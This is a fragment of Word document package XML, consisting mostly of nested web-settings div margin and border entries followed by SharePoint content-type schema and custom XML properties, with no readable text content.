            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1893076776">
          <w:marLeft w:val="-225"/>
          <w:marRight w:val="-225"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1920139626">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1419903639">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1402213750">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="248127569">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="395932253">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="1031683430">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="209809565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3946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7203">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="127823644">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1183087467">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="945574653">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="912932590">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="20202752">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="149737767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2970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7759">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="12" w:space="12" w:color="C2C2C2"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1605185712">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1613633008">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1617173993">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1619683909">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1664047596">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1670326978">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1394543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608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1393294">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1684741351">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1685470948">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1716393138">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1721586740">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1721592224">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1746679636">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1749962936">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1785340249">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1789198597">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1859157379">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1905336650">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1920171680">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="341592513">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1496343131">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1448548143">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="702902035">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="176267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0574">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="158274254">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="524442345">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1055736359">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1070536761">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="114565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29043">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1981111173">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1368214139">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1833518657">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="2105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484960">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2073001408">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2074235220">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2080252059">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2087918697">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2109737490">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="827404942">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1367023282">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="62766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2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4e3132c7-a2f3-42f9-84ee-56b25104e8a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AABC34BFD7C5D4685D4B72BD5549D01" ma:contentTypeVersion="13" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="d62b6597ffbc3d6e7ed6ad120b31a5a1">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="4e3132c7-a2f3-42f9-84ee-56b25104e8a3" xmlns:ns4="0cba1d9c-1801-47b8-aafb-7327be6ae70c" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="4d2d3c532e53bc9870b5b222199462a6" ns3:_="" ns4:_="">
    <xsd:import namespace="4e3132c7-a2f3-42f9-84ee-56b25104e8a3"/>
    <xsd:import namespace="0cba1d9c-1801-47b8-aafb-7327be6ae70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GenerationTime" minOccurs="0"/>
                <xsd:element ref="ns3:MediaServiceEventHashCode" minOccurs="0"/>
                <xsd:element ref="ns3:MediaLengthInSecond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3132c7-a2f3-42f9-84ee-56b25104e8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ba1d9c-1801-47b8-aafb-7327be6ae70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B09429-1CC4-43E0-AE66-F29F285959FF}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
